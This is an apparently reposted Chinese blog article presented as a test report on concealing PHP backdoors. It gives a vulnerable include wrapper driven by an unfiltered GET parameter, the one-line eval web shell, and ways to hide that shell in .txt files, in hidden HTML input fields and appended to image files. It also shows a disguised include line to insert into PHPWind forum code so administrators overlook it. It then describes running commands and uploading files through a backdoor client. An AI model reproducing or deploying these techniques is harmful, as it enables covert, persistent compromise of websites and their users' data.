PHP网站后门的隐藏技巧测试报告
技巧
要知道如果光把PHP语句放到图片里是无论如何也不能执行的,因为PHP只解析扩展名为php的文件。所以说要能使隐藏在图片里的PHP语句执行。我们就的借助PHP中的调用函数 :include 、require 等。
我们还记得前些日子把木马隐藏到图片的文章吧。也就是在PHP文件里用include("x.gif")这样的语句来调用隐藏在图片的木马语句。ASP中语句也类似。看似非常隐蔽但直接调用图片对稍微懂点PHP的人就不难发现可疑之处。由于URL 里用GET方式很难传递参数,这就使得插入木马的性能得不到发挥。
include 函数在PHP中使用的比较频繁,所以引起的安全问题也实在太多,例如PHPWIND1.36的漏洞就是因为include后面的变量没做过滤引起的。由此我们就可以构造类似的语句来插入到PHP文件中。然后把木马隐藏到图片或HTML文件里,可以说隐蔽性就更高了。如在PHPWIND论坛里插入下面的语句:<‘’?@include includ/.$PHPWIND_ROOT;? <mailto:?@include 'includ/'.$PHPWIND_ROOT;?>> 一般管理员是无法看出来的。
有了include 函数来辅助帮忙我们就可以把PHP木马隐藏到 诸如 txt、html和图片文件等很多类型的文件里来了。因为txt、html和图片文件这三种类型的文件最无论在论坛还是文章系统里是最为常见的了,下面我们就依次来做测试。
首先建立一PHP文件test.php 文件内容为:
<?php
$test=$_GET['test'];
@include 'test/'.$test;
?>
Txt文件一般都是说明文件,所以我们把一句话木马放到目录的说明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马<?eval($_POST[cmd]);?>粘贴到t.txt文件里。然后访问 http://localhost/test/test.php?test=../t.txt <http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt> 如果你看到t.txt的内容就证明Ok了, 然后把在lanker微型PHP后门客户端 木马地址添入 http://localhost/test/test.php?test=../t.txt <http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt> 密码里添入cmd就可以了,执行返回的结果都可以看到。
对于HTML的文件,一般都为模版文件。为了使插入到HTML的文件的木马能被调用执行而且不被显示出来,我们可以在HTML里加入一个隐藏属性的文本框 ,如:<input type=hidden value="<?eval($_POST[cmd]);?>"> 然后使用方法同上。执行的返回结果一般都可以查看源文件看到。 如使用查看本程序目录功能。查看源文件内容为 <input type=hidden value="C:\Uniserver2_7s\www\test"> 我可以得到目录为 C:\Uniserver2_7s\www\test。
下面我们说说图片文件,要说最为毒的一招莫过于把木马隐藏到图片里。我们可以直接对一个图片进行编辑,把<?eval($_POST[cmd]);?>插入到图片末尾。
经测试一般都不会对图片造成影响。然后同样方法客户端木马地址添入 <http://localhost/test/test.php?test=../1.jpg>
我们查看PHP环境变量 返回的是结果是原图片。
这里可能要和我们想象的结果有些差距了,其实命令已经运行了,只是返回的结果看不到而已,因为这是真正的GIF文件,所以是不会显示返回结果的,为了证明是否真的执行了命令我们 执行上传文件命令。果不出所料,文件已经成功上传到服务器上。这样伪造的优点是隐蔽性好。缺点也自然不用说了是没回显。如果你想看到返回的结果,那就拿出记事本伪造一个假的图片文件吧。
到这里就基本测试完了,怎样隐蔽PHP后门就看你自己的选择了。行文仓促,如有不妥之处,请指出.
上一篇: 关于下拉列表绑定的小疑点
下一篇: Hibernate源码解读——查询